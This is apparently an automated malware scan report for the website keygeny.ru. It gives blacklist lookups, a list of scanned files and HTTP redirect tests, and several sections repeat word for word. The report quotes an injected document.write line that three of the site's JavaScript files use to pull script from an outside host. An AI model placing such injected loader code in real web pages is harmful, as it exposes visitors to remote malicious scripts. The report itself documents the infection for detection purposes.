Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=keygeny.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://keygeny.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://keygeny.ru/ | 200 OK Content-Length: 19167 Content-Type: text/html | clean |
http://keygeny.ru/engine/ajax/menu.js | 200 OK Content-Length: 3516 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://geekscape.tv/live/jCgLRY6W.php?id=9426241"></script>'); | ||
http://keygeny.ru/engine/ajax/dle_ajax.js | 200 OK Content-Length: 5315 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://geekscape.tv/live/jCgLRY6W.php?id=9426238"></script>'); | ||
http://keygeny.ru/engine/ajax/js_edit.js | 200 OK Content-Length: 7193 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://geekscape.tv/live/jCgLRY6W.php?id=9426240"></script>'); | ||
http://baza.tk/r.php?go=http%3A//baza.tk/opera%3Fwkey%3D359 | 500 Can't connect to baza.tk:80 (Bad hostname) Content-Length: 146 Content-Type: text/plain | clean |
http://baza.tk/test404page.js | 500 Can't connect to baza.tk:80 (Bad hostname) Content-Length: 146 Content-Type: text/plain | clean |
http://sfbaza.ru/SLYDER/slyder.js | 200 OK Content-Length: 3263 Content-Type: application/x-javascript | clean |
http://sfbaza.ru/KeyGeny.RU/BLACK.js | 200 OK Content-Length: 2332 Content-Type: application/x-javascript | clean |
http://sfbaza.ru/KeyGeny.RU/WORLD.js | 200 OK Content-Length: 2204 Content-Type: application/x-javascript | clean |
http://sfbaza.ru/KeyGeny.RU/StimulProfit.js | 200 OK Content-Length: 1483 Content-Type: application/x-javascript | clean |
http://sfbaza.ru/KeyGeny.RU/FilePays.js | 200 OK Content-Length: 1472 Content-Type: application/x-javascript | clean |
http://sfbaza.ru/KeyGeny.RU/BitCash.js | 200 OK Content-Length: 1475 Content-Type: application/x-javascript | clean |
http://sfbaza.ru/KeyGeny.RU/DailyCash.js | 200 OK Content-Length: 1486 Content-Type: application/x-javascript | clean |
http://sfbaza.ru/KeyGeny.RU/Button_S_d.js | 200 OK Content-Length: 700 Content-Type: application/x-javascript | clean |
http://sfbaza.ru/KeyGeny.RU/Button_S_e.js | 200 OK Content-Length: 679 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: keygeny.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 10 Jun 2014 09:14:54 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=WINDOWS-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 10 Jun 2014 02:14:54 +0300 GMT
Set-Cookie: PHPSESSID=q9g1nqu701klspu8lvko8nkq17; path=/
Set-Cookie: dle_user_id=deleted; expires=Mon, 10-Jun-2013 09:14:53 GMT; path=/; domain=.keygeny.ru; httponly
Set-Cookie: dle_password=deleted; expires=Mon, 10-Jun-2013 09:14:53 GMT; path=/; domain=.keygeny.ru; httponly
Set-Cookie: dle_hash=deleted; expires=Mon, 10-Jun-2013 09:14:53 GMT; path=/; domain=.keygeny.ru; httponly
Set-Cookie: dle_onl_session=q9g1nqu701klspu8lvko8nkq17; expires=Wed, 10-Jun-2015 09:14:54 GMT; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: keygeny.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 10 Jun 2014 09:14:54 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=WINDOWS-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 10 Jun 2014 02:14:54 +0300 GMT
Set-Cookie: PHPSESSID=q9g1nqu701klspu8lvko8nkq17; path=/
Set-Cookie: dle_user_id=deleted; expires=Mon, 10-Jun-2013 09:14:53 GMT; path=/; domain=.keygeny.ru; httponly
Set-Cookie: dle_password=deleted; expires=Mon, 10-Jun-2013 09:14:53 GMT; path=/; domain=.keygeny.ru; httponly
Set-Cookie: dle_hash=deleted; expires=Mon, 10-Jun-2013 09:14:53 GMT; path=/; domain=.keygeny.ru; httponly
Set-Cookie: dle_onl_session=q9g1nqu701klspu8lvko8nkq17; expires=Wed, 10-Jun-2015 09:14:54 GMT; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: keygeny.ru
Referer: http://www.google.com/search?q=keygeny.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: keygeny.ru
Referer: http://www.google.com/search?q=keygeny.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.